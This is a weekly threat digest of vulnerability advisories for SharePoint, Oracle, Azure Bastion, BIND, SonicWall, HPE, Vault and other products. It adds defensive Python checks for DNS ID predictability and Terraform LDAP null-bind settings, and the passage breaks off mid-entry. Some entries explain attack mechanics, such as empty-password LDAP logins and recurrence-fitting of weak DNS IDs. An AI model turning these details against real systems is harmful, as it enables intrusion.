Weekly Threat Landscape Digest – Week 48

This week’s threat landscape (Week 48) reveals a surge in newly reported vulnerabilities, enhanced malware capabilities, and increasingly refined social-engineering tactics. Attackers continue to exploit weak authentication flows, outdated components, and misconfigured cloud environments to bypass modern defenses. Our Week 48 roundup highlights the most significant developments to help organizations stay informed and anticipate emerging risks.
- Critical Remote Code Execution Vulnerability in Microsoft SharePoint Online (CVE-2025-59245)
A critical Remote Code Execution (RCE) vulnerability has been identified in Microsoft SharePoint Online, tracked as CVE-2025-59245 (CVSS 9.8, Critical). The issue is caused by unsafe deserialization of untrusted data (CWE-502) and could allow a remote, unauthenticated attacker to execute arbitrary code. Microsoft has already fully mitigated the vulnerability within SharePoint Online, and no customer action is required. There is currently no public exploitation or PoC code available.
Key Details – CVE-2025-59245
• Vulnerability Type: Remote Code Execution (Deserialization of Untrusted Data – CWE-502)
• Affected Product: Microsoft SharePoint Online (Cloud / SaaS)
• Severity: Critical – CVSS v3.1: 9.8
• Attack Vector: Network, unauthenticated
• Root Cause: Unsafe processing of untrusted serialized data
Impact (If Unmitigated)
• Arbitrary code execution inside SharePoint service components
• Unauthorized access or manipulation of SharePoint content
• Potential privilege escalation
• Possible indirect impact on connected M365 services
Status and Exposure
• SharePoint Online: Fully mitigated by Microsoft
• SharePoint On-Prem: Not directly affected; ensure all current patches are applied
Recommended Actions
For SharePoint Online Tenants:
• Mark CVE-2025-59245 as “Mitigated by Cloud Provider” in tracking systems
• Review M365/SharePoint audit logs for unusual admin or application behavior
• Enforce MFA + Conditional Access for privileged accounts
For SharePoint On-Prem / Hybrid:
• Apply all recent SharePoint RCE/security updates
• Restrict admin interfaces to VPN or trusted internal networks
• Monitor for suspicious service or PowerShell activity
Reference
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59245
- Actively Exploited Vulnerability in Oracle Identity Manager (CVE-2025-61757)
A critical pre-authentication Remote Code Execution (RCE) vulnerability in Oracle Identity Manager, part of Oracle Fusion Middleware, is being actively exploited in the wild. The vulnerability, tracked as CVE-2025-61757 (CVSS 9.8, Critical), allows an unauthenticated remote attacker to compromise the Identity Manager server via HTTP due to missing authentication checks in exposed REST API functions. Successful exploitation leads to full system takeover. Organizations running Oracle Fusion Middleware should apply Oracle’s latest patches immediately and restrict external access.
Key Details – CVE-2025-61757
• Vulnerability Type: Pre-authentication Remote Code Execution
• Product: Oracle Identity Manager (Oracle Fusion Middleware)
• Severity: Critical – CVSS v3.1: 9.8
• Attack Vector: Network-based, no authentication required
• Root Cause: Missing authentication checks on sensitive REST API endpoints
• Affected Versions: 12.2.1.4.0 and 14.1.2.1.0
Impact
• Full compromise of Oracle Identity Manager
• Server takeover and complete administrative control
• Potential compromise of identity workflows, authentication flows, and user accounts
• Lateral movement into integrated middleware and enterprise systems
Recommended Actions
• Apply the latest Oracle Critical Patch Update (CPU) addressing CVE-2025-61757
• Ensure all Oracle Fusion Middleware components are updated, not only Identity Manager
• Restrict external exposure of Identity Manager and related middleware services
• Monitor logs for unusual REST API calls, scripting activity, or suspicious authentication behavior
Reference
https://nvd.nist.gov/vuln/detail/CVE-2025-61757
- Critical Authentication Bypass Vulnerability in Azure Bastion (CVE-2025-49752)
A critical authentication bypass vulnerability has been disclosed in Microsoft Azure Bastion, tracked as CVE-2025-49752 (CVSS 10.0, Critical). The flaw allows a remote, unauthenticated attacker to bypass authentication and obtain administrative-level access with a single network request. Azure Bastion brokers RDP/SSH access to Azure Virtual Machines, so a bypass at this layer exposes every VM reachable through it. Microsoft issued the fix on 20 November 2025. Azure Bastion is a Microsoft-managed service with no customer-installable build, so the remediation is applied on the service side; confirm the mitigation status in the MSRC advisory rather than waiting for a local update. No active exploitation has been publicly reported, but the low attack complexity and severity of impact make this an urgent, high-priority item.
Key Details – CVE-2025-49752
• Vulnerability Type: Authentication Bypass and Elevation of Privilege
• CWE: CWE-294 (Authentication Bypass by Capture-Replay)
• Severity: Critical – CVSS v3/v4: 10.0
• Attack Vector: Network, no user interaction required
• Impacted Product: All Azure Bastion deployments
• Root Cause: Improper authentication validation enabling bypass of access checks
Impact
• Complete authentication bypass
• Administrative-level access without credentials
• Remote compromise of Azure Virtual Machines accessed through Bastion
• Potential lateral movement across Azure environments
• Risk of full infrastructure takeover
Recommended Actions
• Confirm in the MSRC advisory that the service-side fix released on 20 November 2025 applies to your tenants; Azure Bastion is a Microsoft-managed service with no customer-installed build, so there is nothing to patch locally
• Inventory all Bastion hosts and the VMs reachable through them so the exposure window can be scoped
• Review Azure Activity Logs and Bastion connection logs for suspicious access patterns
• Enforce Conditional Access and MFA for all privileged Azure accounts
Reference
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49752
- High-Severity Vulnerability in F5 BIG-IP DNS (CVE-2025-40780)
A high-severity vulnerability has been identified in BIND components used within F5 BIG-IP DNS resolvers. The flaw, tracked as CVE-2025-40780 (CVSS 7.5, High), stems from a weakness in BIND’s Pseudo Random Number Generator (PRNG). This weakness allows attackers to predict DNS query IDs and source ports, making it possible to conduct DNS cache poisoning attacks. Successful exploitation could redirect user traffic to attacker-controlled infrastructure, enabling phishing, malware distribution, service disruption, and interception of sensitive data.
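Whether a resolver's outbound queries actually show the ID and port randomisation that defends against cache poisoning can be checked from a capture. The following added example (not F5 or ISC code) scores a list of (txid, source port) pairs: it fits an affine recurrence x[i+1] = a·x[i] + c (mod 2^16) from three consecutive values and reports how much of the remaining sequence that recurrence predicts, which is 1.0 for counters and LCG-style generators and about 0 for a sound PRNG, and it flags a single fixed source port. The two sample generators are constructed stand-ins (a 16-bit LCG with a fixed port for the weak case, os.urandom for the sound case), and the 5% threshold is an assumption. The check only catches affine structure; real evidence against a production resolver needs a full statistical suite over a pcap.

```python
"""Score how predictable a resolver's outbound DNS transaction IDs and source
ports look. Added example for this digest, not F5 or ISC code.

Input: a list of (txid, sport) pairs as seen on the wire (e.g. pulled from a
pcap of the resolver's outbound queries). The two sample generators below are
constructed stand-ins, not captures from any product."""
import os
import struct

MOD16 = 1 << 16


def affine_predict_rate(values, modulus=MOD16):
    """Fit x[i+1] = (a*x[i] + c) mod modulus from the first three values whose
    first difference is odd (so it is invertible mod 2^k), then report the
    share of the remaining transitions the fitted recurrence predicts.
    Counters and LCG-style generators score 1.0; a sound PRNG scores ~0.
    This only catches affine structure; it is not a full randomness suite."""
    for i in range(len(values) - 3):
        x0, x1, x2 = values[i], values[i + 1], values[i + 2]
        d = (x1 - x0) % modulus
        if d % 2 == 0:
            continue
        a = ((x2 - x1) * pow(d, -1, modulus)) % modulus
        c = (x1 - a * x0) % modulus
        rest = values[i + 2:]
        hits = sum(1 for p, q in zip(rest, rest[1:]) if (a * p + c) % modulus == q)
        return hits / max(1, len(rest) - 1)
    return 0.0


def assess(samples, max_predict_rate=0.05):
    """samples: list of (txid, sport). Flags a single fixed source port or an
    affine-predictable ID/port sequence. The 5% threshold is an assumption."""
    txids = [t for t, _ in samples]
    sports = [p for _, p in samples]
    result = {
        "txid_predict_rate": affine_predict_rate(txids),
        "sport_predict_rate": affine_predict_rate(sports),
        "fixed_port": len(set(sports)) == 1,
    }
    result["predictable"] = (
        result["fixed_port"]
        or result["txid_predict_rate"] > max_predict_rate
        or result["sport_predict_rate"] > max_predict_rate
    )
    return result


def weak_samples(n, seed=12345):
    """Constructed weak case: txids from a 16-bit LCG (a=25173, c=13849,
    classic full-period parameters) and one fixed source port, i.e. the
    behaviour a predictable PRNG collapses back to."""
    x = seed & 0xFFFF
    out = []
    for _ in range(n):
        x = (25173 * x + 13849) & 0xFFFF
        out.append((x, 32768))
    return out


def strong_samples(n):
    """Constructed sound case: txid and source port from os.urandom, port
    confined to the ephemeral range 1024-65535."""
    out = []
    for _ in range(n):
        txid, r = struct.unpack("<HH", os.urandom(4))
        out.append((txid, 1024 + r % (MOD16 - 1024)))
    return out


if __name__ == "__main__":
    for name, s in (("weak", weak_samples(500)), ("strong", strong_samples(500))):
        print(name, assess(s))
```

Feed it real pairs by extracting the DNS ID and UDP source port of each outbound query from a capture taken on the resolver; a few hundred consecutive queries are enough for the affine fit.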
Key Details – CVE-2025-40780
• Vulnerability Type: Predictable PRNG leading to DNS Cache Poisoning
• Affected Component: BIND resolver within BIG-IP DNS
• Severity: High – CVSS v3.1: 7.5
• Attack Vector: Network
• Root Cause: Weak randomness in BIND PRNG enabling predictable DNS query parameters
Impact
• Injection of forged DNS records into resolver cache
• Redirection of users to malicious or attacker-controlled IPs
• Potential interception or manipulation of network traffic
• Disruption of application routing and service availability
• Increased risk of phishing, credential theft, and malware delivery
Affected Products
• BIND 9:
Versions 9.16.0–9.16.50
Versions 9.18.0–9.18.39
Versions 9.20.0–9.20.13
Versions 9.21.0–9.21.12
Extended Support: 9.16.8-S1–9.16.50-S1, 9.18.11-S1–9.18.39-S1, 9.20.9-S1–9.20.13-S1
• F5 BIG-IP DNS:
Versions 15.x
Versions 16.x
Versions 17.x
Versions 21.x
Recommended Actions
• Apply vendor-provided F5 and BIND patches as soon as they are released
• Upgrade all affected versions to the latest secure builds
• Review DNS resolver security configurations (DNSSEC, response rate limiting, ACLs)
• Monitor DNS logs for suspicious or abnormal query/response behavior
• Limit exposure of DNS resolvers to untrusted networks
Reference
https://my.f5.com/manage/s/article/K000157948
- Security Updates – Chrome OS
Google has released a new Long Term Support (LTS) update for Chrome OS addressing multiple security vulnerabilities, including a high-severity type confusion flaw in the V8 JavaScript engine. These vulnerabilities could allow attackers to execute arbitrary code, escalate privileges, or cause system instability through malicious web content or applications. Users and administrators are advised to update Chrome OS to the latest LTS version immediately.
Key Vulnerabilities
• CVE-2025-13224 – Type Confusion in V8 (High Severity)
A flaw in the V8 JavaScript engine may allow arbitrary code execution or system crashes through crafted web content or malicious apps.
• Additional vulnerabilities included in this update:
CVE-2025-21700
CVE-2025-21702
CVE-2025-21703
CVE-2025-21756
CVE-2025-21836
CVE-2025-21971
CVE-2025-37752
CVE-2025-37756
CVE-2025-37798
CVE-2024-27397
Fixed Version
• Chrome OS LTS Version: 138.0.7204.298
• Platform Version: 16295.83.0
Impact
• Arbitrary code execution via malicious JavaScript or web content
• Possible privilege escalation
• Potential browser or system instability
• Increased risk for users regularly accessing untrusted websites
Recommended Actions
• Update all Chrome OS devices to LTS version 138.0.7204.298 or later
• Ensure automatic updates are enabled across Chrome OS fleets
• Monitor Chrome OS devices for unusual behavior or performance anomalies
• Review enterprise policies to enforce secure update channels
Reference
https://chromereleases.googleblog.com/2025/11/long-term-support-channel-updatefor_21.html
- Security Updates – Apple (CVE-2025-43515)
Apple has released a security update for Compressor, addressing a high-severity vulnerability that could allow an unauthenticated attacker on the same network to execute arbitrary code on affected systems. The vulnerability, tracked as CVE-2025-43515 (CVSS 8.8, High), stems from improper handling of external network connections within Compressor. Successful exploitation may result in unauthorized access, compromise of system integrity, or full control of the Compressor server. All users running affected versions should update immediately.
Key Details – CVE-2025-43515
• Vulnerability Type: Remote Code Execution
• Severity: High – CVSS v3.1: 8.8
• Root Cause: Improper handling of external network connections
• Impact: Arbitrary code execution by unauthenticated users on the same network
• Risk: Unauthorized access, system compromise, potential full server takeover
Affected Products
• Compressor 4.11.0 and earlier
• Platform: macOS Sequoia 15.6 and later (the platform on which the fixed 4.11.1 release is available)
Fixed Version
• Compressor 4.11.1 or later
Impact
• Attacker may execute malicious code on Compressor servers
• Potential takeover or manipulation of video encoding workflows
• Compromise of system integrity or broader macOS environment
Recommended Actions
• Update Compressor to version 4.11.1 or later
• Ensure macOS systems are fully updated to the latest security release
• Restrict access to Compressor servers on internal networks
• Monitor affected systems for unusual activity following update
References
https://support.apple.com/en-us/125693
https://www.tenable.com/cve/CVE-2025-43515
- High-Severity Local Privilege Escalation Vulnerability in ASUS (CVE-2025-59373)
ASUS has released security updates to address a high-severity Local Privilege Escalation (LPE) vulnerability in the ASUS System Control Interface Service, a core component used by the MyASUS application across ASUS desktops, laptops, NUC devices, and All-in-One systems. The vulnerability, tracked as CVE-2025-59373 (CVSS 8.5, High), allows a low-privileged attacker or malware running as a standard Windows user to escalate privileges to SYSTEM, the highest permission level on Windows. The flaw is caused by improper validation in a file-restore mechanism, which can allow unprivileged users to copy or replace files in protected system paths. ASUS has released patched versions for both x64 and ARM platforms, and updates should be applied immediately.
Key Details – CVE-2025-59373
• Vulnerability Type: Local Privilege Escalation (LPE)
• Severity: High – CVSS v4.0 Score: 8.5
• Attack Vector: Local
• Root Cause: Improper validation allowing unauthorized file replacement in protected paths
• Impacted Component: ASUS System Control Interface (used by MyASUS on all major ASUS devices)
Impact
• Escalation of privileges from standard user to SYSTEM
• Complete control over affected ASUS systems
• Potential for malware to gain full administrative access
• Risk of system manipulation, persistence, or disabling of security controls
Fixed Versions
• ASUS System Control Interface 3.1.48.0 (x64)
• ASUS System Control Interface 4.2.48.0 (ARM)
Recommended Actions
• Apply the latest ASUS patches immediately on all affected systems
• Ensure automated updates are enabled for MyASUS and ASUS system utilities
• Monitor endpoints for privilege escalation attempts or unusual file replacement behavior
• Restrict local user privileges where possible to reduce exploit potential
Reference
https://www.asus.com/security-advisory/
- Multiple Vulnerabilities in SonicWall Email Security and Firewalls
SonicWall has disclosed several vulnerabilities, two of them high-severity, affecting SonicWall Email Security appliances and the SonicOS SSLVPN service: a stack-based buffer overflow, download of code without an integrity check, and a path traversal flaw. Successful exploitation may result in denial of service, persistent arbitrary code execution, or unauthorized file access.
- CVE-2025-40601 – Stack-Based Buffer Overflow (SonicOS SSLVPN)
• Severity: CVSS 7.5 (High)
• Impact: Remote unauthenticated attackers can trigger DoS and crash the firewall
• Affected Component: SonicOS SSLVPN service (only if enabled)
Affected Platforms & Versions (CVE-2025-40601)
• Gen7 Hardware Firewalls: TZ270/TZ270W, TZ370/TZ370W, TZ470/TZ470W, TZ570/TZ570W/TZ570P, TZ670, NSa 2700/3700/4700/5700/6700, NSsp 10700/11700/13700/15700
• Gen7 Virtual Firewalls (NSv): NSv270, NSv470, NSv870 (ESX, KVM, Hyper-V, AWS, Azure)
• Affected Versions: 7.3.0-7012 and earlier (7.0.1 not affected)
• Gen8 Hardware Firewalls: TZ80–TZ680, NSa 2800–5800
• Affected Versions: 8.0.2-8011 and earlier
Fixed Versions:
• Gen7: 7.3.1-7013 and later
• Gen8: 8.0.3-8011 and later
- CVE-2025-40604 – Download of Code Without Integrity Check (Email Security)
• Severity: CVSS 7.2 (High)
• Description: Email Security appliances load root filesystem images without signature validation
• Impact: Attackers with datastore or VMDK access can modify system files and achieve persistent arbitrary code execution
- CVE-2025-40605 – Path Traversal Vulnerability (Email Security)
• Severity: CVSS 4.9 (Medium)
• Description: Crafted directory traversal sequences (../) allow access to restricted paths
• Impact: Unauthorized read access to files outside the intended directory scope
Affected Email Security Products (CVE-2025-40604 & CVE-2025-40605)
• ES 5000, 5050, 7000, 7050, 9000, VMware, Hyper-V
• Affected Versions: 10.0.33.8195 and earlier
Fixed Versions: 10.0.34.8215, 10.0.34.8223 and later
Impact Summary
• Remote DoS on firewalls running SonicOS SSLVPN
• Persistent arbitrary code execution on Email Security appliances
• Unauthorized file access via path traversal
• System instability, data compromise, or malicious persistence
Recommended Actions
• Update all affected SonicWall firewalls and Email Security appliances to fixed versions
• Disable SonicOS SSLVPN if not required
• Restrict access to datastore/VMDK environments
• Monitor logs for unusual access attempts, crashes, or anomalies
• Segment management interfaces from untrusted networks
References
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016
- Multiple Vulnerabilities in HPE Aruba Networking Products
Multiple high-severity vulnerabilities have been identified across HPE Aruba Networking AirWave, 100 Series Cellular Bridge, and AOS-CX software. These issues include command injection, remote code execution (RCE), directory traversal, denial of service (DoS), privilege escalation, and exposure of sensitive information. Successful exploitation may allow attackers to execute arbitrary commands, disrupt network operations, escalate privileges, or gain unauthorized access.
- HPE Aruba AirWave – Multiple Vulnerabilities
• CVE-2025-37163 – Authenticated Command Injection in CLI
• CVE-2024-12084 to CVE-2024-12088, CVE-2024-12747 – Rsync Daemon Vulnerabilities (RCE, Directory Traversal, Information Disclosure)
Affected Versions: AirWave 8.3.0.4 and below
Fixed Versions: AirWave 8.3.0.5 and above
- HPE Aruba 100 Series Cellular Bridge – Multiple Vulnerabilities
• CVE-2025-37161 – Unauthenticated Remote DoS via Web Management Interface
• CVE-2025-37162 – Authenticated Command Injection (Arbitrary Remote Command Execution)
Affected Versions: AOS-10.7.1.x (10.7.1.1 and below)
Fixed Versions: AOS-10.7.2.0 and above
- HPE Aruba AOS-CX – Multiple Vulnerabilities
• CVE-2025-37155 – Authenticated Privilege Escalation
• CVE-2025-37156 – Platform-Level DoS
• Rsync Daemon Issues: CVE-2024-12084 to CVE-2024-12088, CVE-2024-12747
• CVE-2025-37157 / CVE-2025-37158 – Authenticated Command Injection
• CVE-2025-26466 – DoS via OpenSSH Client/Server
• CVE-2025-37159 – Authenticated Session Hijacking
• CVE-2024-37160 – Authenticated Broken Access Control in REST API
Affected AOS-CX Versions:
• 10.16.xxxx: 10.16.1000 and below
• 10.15.xxxx: 10.15.1020 and below
• 10.14.xxxx: 10.14.1050 and below
• 10.13.xxxx: 10.13.1090 and below
• 10.10.xxxx: 10.10.1160 and below
Fixed Versions:
• 10.16.xxxx: 10.16.1001 and above
• 10.15.xxxx: 10.15.1030 and above
• 10.14.xxxx: 10.14.1060 and above
• 10.13.xxxx: 10.13.1101 and above
• 10.10.xxxx: 10.10.1170 and above
Impact Summary
• Arbitrary command execution
• Remote DoS affecting network availability
• Unauthorized access to configuration and sensitive data
• Authentication bypass and session hijacking
• Escalation of privileges within managed environments
Recommended Actions
• Apply HPE-provided patches or mitigation steps immediately
• Upgrade all affected AirWave, 100 Series Cellular Bridge, and AOS-CX versions
• Restrict management interfaces to trusted networks
• Monitor logs for unusual authentication, command, or session activity
• Enforce strong RBAC and network segmentation
References
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us
- Critical Vulnerability in Apache Causeway
A critical remote code execution (RCE) vulnerability has been identified in Apache Causeway, a framework widely used for building domain-driven Java applications. The flaw exists in the ViewModel functionality and allows authenticated attackers to exploit unsafe Java deserialization processes, enabling arbitrary code execution through malicious URL parameters.
Vulnerability Details
• CVE-2025-64408
• Severity: Critical
• Affected Component: ViewModel functionality
• The issue results from unsafe Java deserialization triggered via user-controlled URL parameters. When processing ViewModel-based requests, affected versions reconstruct serialized object graphs, allowing an attacker to inject malicious serialized payloads.
• Impact: Authenticated attackers can execute arbitrary code within the application by supplying crafted URL parameters.
Affected Versions
• Apache Causeway 2.0.0 to 3.4.0
• Apache Causeway 4.0.0-M1
Fixed Version
• Apache Causeway 3.5.0 or later
Recommended Actions
• Update affected deployments to Apache Causeway 3.5.0 or later
• Review application logs for suspicious URL parameter patterns or deserialization-related errors
• Restrict access to administrative or sensitive ViewModel endpoints
• Implement strict input validation and disable unsafe deserialization features where possible
References
https://nvd.nist.gov/vuln/detail/CVE-2025-64408
- Multiple Vulnerabilities in HPE Telco Service Activator
Multiple vulnerabilities have been identified in HPE Telco Service Activator that could allow remote attackers to cause denial-of-service (DoS) conditions through improper handling of system resources. Successful exploitation may lead to service disruption, resource exhaustion, and degraded performance across affected deployments.
Vulnerability Details
• CVE-2025-9784 — Uncontrolled Resource Consumption
– CVSS v3.1: 7.5 (High)
– Impact: Remote attackers may trigger excessive consumption of system resources, potentially causing complete service outages.
• CVE-2025-48795 — Resource Management Weakness
– CVSS v3.1: 5.6 (Medium)
– Impact: High-complexity attack leading to partial loss of confidentiality, integrity, and availability due to improper shutdown or release of resources.
• CVE-2025-8916 — Allocation of Resources Without Limits
– CVSS v3.1: 5.3 (Medium)
– Impact: Attackers can cause uncontrolled resource allocation, resulting in degraded performance.
Affected Versions
• HPE Telco Service Activator 10.3.3 and earlier
Fixed Versions
• HPE Telco Service Activator 10.4.0 or later
Recommended Actions
• Update to Telco Service Activator v10.4.0 or later
• Apply all vendor-released security advisories and patches
• Monitor system performance and logs for signs of resource exhaustion
• Implement rate limiting or workload management controls to reduce DoS exposure
References
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04973en_us
- High-Severity Vulnerability in the Vault Terraform Provider
A high-severity vulnerability has been disclosed in the Vault Terraform Provider that could allow attackers to authenticate to HashiCorp Vault without valid credentials under specific LDAP configurations. The issue stems from insecure defaults related to LDAP anonymous binds, potentially leading to unauthorized access and compromise of sensitive secrets.
Vulnerability Details
• CVE-2025-13357
• CVSS Score: 7.4 (High)
• Affected Component: Vault Terraform Provider (LDAP authentication configuration)
• The provider's LDAP auth backend resource defaulted deny_null_bind to false, overriding Vault's own server-side default of true and allowing LDAP “null” (anonymous) binds.
• If the backend LDAP server also accepts anonymous binds, an attacker who knows a valid username can log in to Vault with an empty password and receive that user's token and policies.
• Impact: Unauthorized access, potential privilege escalation, and exposure of secrets, tokens, and protected Vault resources.
Affected Versions
• Vault Terraform Provider v4.2.0 through v5.4.0
Fixed Version
• Vault Terraform Provider v5.5.0 or later
Recommended Actions
• Upgrade to version v5.5.0 or later immediately
• Set deny_null_bind = true explicitly in every LDAP auth backend resource and confirm the live setting on the server (vault read auth/ldap/config)
• Disable anonymous binds on backend LDAP servers
• Audit existing Vault access logs for unexpected LDAP bind behaviors
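To catch this misconfiguration in infrastructure code before it reaches Vault, the following added example (not HashiCorp code) scans the JSON that `terraform show -json` emits for a plan and flags every `vault_ldap_auth_backend` resource whose `deny_null_bind` is false or unset. An unset value means the provider default, which the affected provider versions set to false even though Vault's own server-side default is true, so unset is only safe once the provider is at v5.5.0 or later. The `planned_values.root_module.resources` layout is Terraform's real plan-JSON structure; the sample plan itself is constructed.

```python
"""Flag vault_ldap_auth_backend resources that would permit LDAP null
(anonymous) binds. Added example, not HashiCorp code.

Reads the JSON produced by `terraform show -json tfplan`
(planned_values.root_module.resources, nested child_modules).
SAMPLE_PLAN below is constructed."""
import json

RESOURCE_TYPE = "vault_ldap_auth_backend"


def _walk(module):
    """Yield every resource in a module and, recursively, its child modules."""
    for r in module.get("resources", []):
        yield r
    for child in module.get("child_modules", []):
        yield from _walk(child)


def find_null_bind_risks(plan_json, provider_default_denies=False):
    """Return [(address, reason)] for LDAP auth backends that would accept
    null binds.

    provider_default_denies=False models an affected provider (v4.2.0-v5.4.0):
    an unset deny_null_bind means the provider sends false. Pass True once the
    provider is v5.5.0+ so unset values (now defaulting to true) stop being
    flagged; an explicit false is flagged either way."""
    plan = json.loads(plan_json) if isinstance(plan_json, str) else plan_json
    root = plan.get("planned_values", {}).get("root_module", {})
    findings = []
    for r in _walk(root):
        if r.get("type") != RESOURCE_TYPE:
            continue
        val = r.get("values", {}).get("deny_null_bind")
        if val is False:
            findings.append((r["address"], "deny_null_bind explicitly false"))
        elif val is None and not provider_default_denies:
            findings.append((r["address"],
                             "deny_null_bind unset; affected provider defaults to false"))
    return findings


# Constructed sample plan: one explicit false, one unset, one unrelated
# resource, and one correctly hardened backend inside a child module.
SAMPLE_PLAN = {
    "planned_values": {
        "root_module": {
            "resources": [
                {"address": "vault_ldap_auth_backend.corp", "type": RESOURCE_TYPE,
                 "values": {"path": "ldap", "url": "ldaps://ldap.example.internal",
                            "deny_null_bind": False}},
                {"address": "vault_ldap_auth_backend.lab", "type": RESOURCE_TYPE,
                 "values": {"path": "ldap-lab", "url": "ldap://ldap-lab.example.internal"}},
                {"address": "vault_mount.kv", "type": "vault_mount",
                 "values": {"path": "secret"}},
            ],
            "child_modules": [
                {"address": "module.auth", "resources": [
                    {"address": "module.auth.vault_ldap_auth_backend.hq",
                     "type": RESOURCE_TYPE,
                     "values": {"path": "ldap-hq", "deny_null_bind": True}},
                ]},
            ],
        }
    }
}


if __name__ == "__main__":
    for address, reason in find_null_bind_risks(SAMPLE_PLAN):
        print(f"{address}: {reason}")
```

Run it against `terraform show -json tfplan > plan.json` as a pre-apply gate; after upgrading the provider, rerun with provider_default_denies=True so only explicit false values remain as findings.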
- Apache Syncope AES Default Encryption Key Vulnerability
A high-severity vulnerability has been identified in Apache Syncope affecting deployments that use AES encryption to store internal user password values. The flaw stems from the use of a hard-coded default AES key, which allows attackers with database access to decrypt and recover cleartext passwords, potentially leading to widespread credential compromise and privilege escalation across integrated systems.
Vulnerability Details
• CVE-2025-65998
• Base Score: 7.5 (High)
• When AES encryption is enabled, Apache Syncope uses a hard-coded default AES key, instead of generating or requiring a unique deployment-specific key.
• Impact: An attacker with access to the application database can:
Retrieve encrypted password values
Decrypt them using the known default key
Recover cleartext user credentials, which may also grant access to downstream systems connected via provisioning connectors
Affected Versions
• Syncope 2.1 – 2.1.14
• Syncope 3.0 – 3.0.14
• Syncope 4.0 – 4.0.2
Fixed Versions
• Syncope 3.0.15
• Syncope 4.0.3
Recommended Actions
• Immediately upgrade to Syncope 3.0.15 or 4.0.3
• If AES encryption is used, rotate all stored credentials after the upgrade
• Implement secure key management practices and ensure unique encryption keys are used per deployment
• Restrict access to the Syncope database and monitor for suspicious access attempts
References
https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts
- Denial of Service (DoS) Vulnerability in SonicOS
A high-severity stack-based buffer overflow vulnerability has been disclosed in the SonicOS SSLVPN service, allowing remote unauthenticated attackers to trigger a Denial-of-Service (DoS) condition on affected firewalls. This vulnerability, tracked as CVE-2025-40601, may cause impacted devices to crash before authentication occurs.
Vulnerability Details
• CVE-2025-40601
• Severity: High (CVSS v3.0: 7.5)
• Type: Stack-Based Buffer Overflow
• CWE-121: Improper Restriction of Operations within the Bounds of a Memory Buffer
• Exploitation allows an unauthenticated attacker to send crafted requests to the SSLVPN service, resulting in a crash and loss of availability.
• No active exploitation has been observed, but SonicWall advises immediate mitigation.
Affected Products
• Gen7 Hardware Firewalls: TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700
– Affected Versions: 7.3.0-7012 and older (7.0.1 branch not affected)
• Gen7 Virtual Firewalls (NSv): NSv270, NSv470, NSv870 (ESX, KVM, HYPER-V, AWS, Azure)
– Affected Versions: 7.3.0-7012 and older
• Gen8 Firewalls: TZ80, TZ280, TZ380, TZ480, TZ580, TZ680, NSa 2800, NSa 3800, NSa 4800, NSa 5800
– Affected Versions: 8.0.2-8011 and older
Fixed Versions
• Gen7 Hardware & Virtual Firewalls: 7.3.1-7013 and later
• Gen8 Firewalls: 8.0.3-8011 and later
Recommended Actions
• Apply the latest firmware updates for all affected SonicWall platforms
• If patching is not immediately possible, restrict access to SSLVPN interfaces
• Monitor logs for abnormal SSLVPN activity or repeated crash events
• Assess firewall availability and ensure redundancy where applicable
References
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016
- Security Updates – NVIDIA
NVIDIA has released multiple security updates addressing vulnerabilities across DGX Spark, NeMo Framework, and the NeMo Agent Toolkit. These vulnerabilities range from code execution and privilege escalation to data tampering, information disclosure, and denial of service, potentially impacting AI infrastructure, LLM processing pipelines, and high-performance computing devices.
Vulnerability Details
Critical Severity
• CVE-2025-33187 (DGX Spark): Vulnerability in DGX Spark GB10 SROOT allowing privileged users to access protected SoC areas, potentially leading to code execution, data tampering, information disclosure, denial of service, or privilege escalation.
High Severity
• CVE-2025-33188 (DGX Spark): Hardware resource tampering may lead to information disclosure, data tampering, and DoS.
• CVE-2025-33189 (DGX Spark): SROOT firmware out-of-bound write enabling code execution, information disclosure, tampering, DoS, and privilege escalation.
• CVE-2025-33204 (NeMo Framework): NLP/LLM code injection vulnerability allowing arbitrary code execution, privilege escalation, data access, and tampering.
• CVE-2025-33205 (NeMo Framework): Improper predefined variable handling enabling code execution.
• CVE-2025-33203 (NeMo Agent Toolkit): SSRF vulnerability in chat API endpoint allowing information disclosure and DoS.
Medium Severity
• CVE-2025-33190 (DGX Spark): SROOT out-of-bound write leading to code execution, tampering, DoS, or escalation.
• CVE-2025-33191 (DGX Spark): OSROOT invalid memory read potentially triggering DoS.
• CVE-2025-33192–33197 (DGX Spark): Multiple SROOT issues involving arbitrary memory read, improper validation, unexpected operations, resource reuse, and NULL pointer dereference — enabling data disclosure, tampering, DoS, or code execution.
Low Severity
• CVE-2025-33198–33200 (DGX Spark): Resource reuse and incorrect control flow vulnerabilities potentially causing information disclosure or data tampering.
Affected Products & Fixed Versions
• DGX Spark: All versions prior to OTA0 → Update to OTA0
• NeMo Framework: All versions prior to 2.5.1 → Update to 2.5.1
• NeMo Agent Toolkit: All versions prior to 1.3.0 → Update to 1.3.0
Recommended Actions
• Apply all NVIDIA-released security updates immediately
• Upgrade DGX Spark, NeMo Framework, and NeMo Agent Toolkit to fixed versions
• Review system logs for unusual memory operations or tampering
• Restrict privileged access on DGX Spark hardware environments
• Monitor LLM and NLP workloads for abnormal execution patterns
References
https://nvidia.custhelp.com/app/answers/detail/a_id/5720
https://nvidia.custhelp.com/app/answers/detail/a_id/5729
https://nvidia.custhelp.com/app/answers/detail/a_id/5726
- Critical Vulnerability in ABB Ability Edgenius
A critical authentication bypass vulnerability has been identified in ABB Ability Edgenius Management Portal. The flaw enables unauthenticated attackers to access privileged system functions, including application management and configuration control, posing a severe risk to edge environments.
Vulnerability Details
• CVE-2025-10571
• CVSS v3.1 Score: 9.6 (Critical)
• The vulnerability arises from improper authentication validation, allowing specially crafted messages to bypass authentication checks.
• Successful exploitation allows an unauthenticated attacker to:
– Install or uninstall applications
– Execute arbitrary code
– Modify deployed application configurations
– Obtain full administrative control over the edge environment
Affected Versions
